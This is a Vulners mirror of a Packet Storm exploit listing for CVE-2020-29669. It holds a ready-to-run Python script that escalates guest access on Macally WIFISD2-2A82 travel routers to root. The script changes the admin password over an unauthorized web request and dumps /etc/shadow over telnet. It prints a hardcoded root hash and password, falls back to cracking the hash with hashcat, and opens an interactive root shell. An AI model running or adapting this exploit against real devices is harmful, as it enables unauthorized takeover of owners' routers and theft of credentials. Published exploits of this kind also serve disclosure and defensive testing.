Macally WIFISD2-2A82 2.000.010 Privilege Escalation
ποΈΒ 14 Dec 2020Β 00:00:00Reported byΒ Maximilian BarzTypeΒ
Β packetstormπΒ packetstormsecurity.comπΒ 358Β Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Exploit for Improper Authentication in Macally Wifisd2-2A82_Firmware | 3 Dec 202020:00 | β | githubexploit | |
| Macally WIFISD2-2A82 Media and Travel Router Authorization Issues Vulnerability | 13 Dec 202000:00 | β | cnnvd | |
| CVE-2020-29669 | 14 Dec 202001:39 | β | cve | |
| CVE-2020-29669 | 14 Dec 202001:39 | β | cvelist | |
| Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation | 14 Dec 202000:00 | β | exploitdb | |
| CVE-2020-29669 | 14 Dec 202002:15 | β | nvd | |
| CVE-2020-29669 | 14 Dec 202002:15 | β | osv | |
| Design/Logic Flaw | 14 Dec 202002:15 | β | prion | |
| CVE-2020-29669 | 22 May 202515:28 | β | redhatcve |
`# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
# Date: 03.12.2020
# Exploit Author: Maximilian Barz and Daniel Schwendner
# Vendor Homepage: https://us.macally.com/products/wifisd2
# Version: 2.000.010
# Tested on: Kali Linux 5.7.0-kali1-amd64
# CVE : CVE-2020-29669
# Reference: https://github.com/S1lkys/CVE-2020-29669/
#!/usr/bin/env/python3
import requests
import telnetlib
import os
import sys
import re
banner = '''\033[94m
ββββββ βββββββββ βββ ββββββ ββββ β ββ ββββββ ββββββ βββββββββ
βββ β β βββ ββββββββ βββ β ββββββββββ ββ βββββββ β ββββββ β β βββ ββ
β ββββ β ββββ βββββ βββ βββ βββ βββββ ββββββ βββββββ βββ ββ ββββ β ββββ ββ
β ββββ ββββ β βββββββββ βββββββ ββββββ βββ βββββββββββ β ββββ ββββ β
βββββββββ ββββ β ββ ββββββββ βββββββ βββββββββββ ββββ βββββββββββββ ββββ β
β βββ β β β ββ ββ βββββ ββ ββββββββββββββββ β β β ββ βββββ βββ β β β ββ
β ββ β β β β ββ β ββ β βββββ β ββββ β β ββ β βββ ββ β β β
β β β β β β ββ β β β βββ β β ββ β β β β β
β β β β β β β β
β
\x1b[0m
Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
session = requests.Session()
guest_creds = "guest_pass"
admin_pass_to_set = "Silky123"
def send_requests():
url = "http://"+rhost+"/protocol.csp?function=set"
payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/index.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '65',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
r= session.post(url, payload, headers)
if (b"<errno>0</errno>" in r.content):
print("\033[92m[+] Authentication successful\x1b[0m")
print("\t"+str(session.cookies.get_dict()))
else:
print("\033[91m[+] Authentication failed.\x1b[0m")
sys.exit()
url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/app/user/guest.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '49',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
d = session.post(url, payload, headers)
if (b"<errno>0</errno>" in d.content):
print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
telnet_grep_root_hash()
#print("[+] Spawning Admin Shell")
#telnet_login()
else:
print("\033[91m[+] Admin Password change failed\x1b[0m")
sys.exit()
def telnet_grep_root_hash():
user = "admin"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(admin_pass_to_set.encode('ascii') + b"\n")
print("\033[92m[+] Dumping Hashes:\x1b[0m")
tn.write(b"cat /etc/shadow\n\r")
tn.write(b"exit\n")
output = tn.read_all().decode('ascii')
L = output.split('\n')
for hash in L:
if ":" in hash:
print("\t"+hash)
print("\n\r")
for hash in L:
if "root" in hash:
print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
f = open("root_hash","w+")
f.write(hash)
f.close()
crack_root_hash();
def crack_root_hash():
f = open("root_hash", "r")
hash = f.read()
if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
print("\033[92mRoot Password: 20080826\x1b[0m\n")
telnet_login()
else:
os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
def telnet_login():
print("\033[92m[+] Spawning Rootshell\x1b[0m")
user = "root"
root_password="20080826"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(root_password.encode('ascii') + b"\n")
tn.interact()
print(banner)
send_requests()
if(__name__ == '__main__'):
main()
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Dec 2020 00:00Current
1Low risk
Vulners AI Score1
EPSS0.04866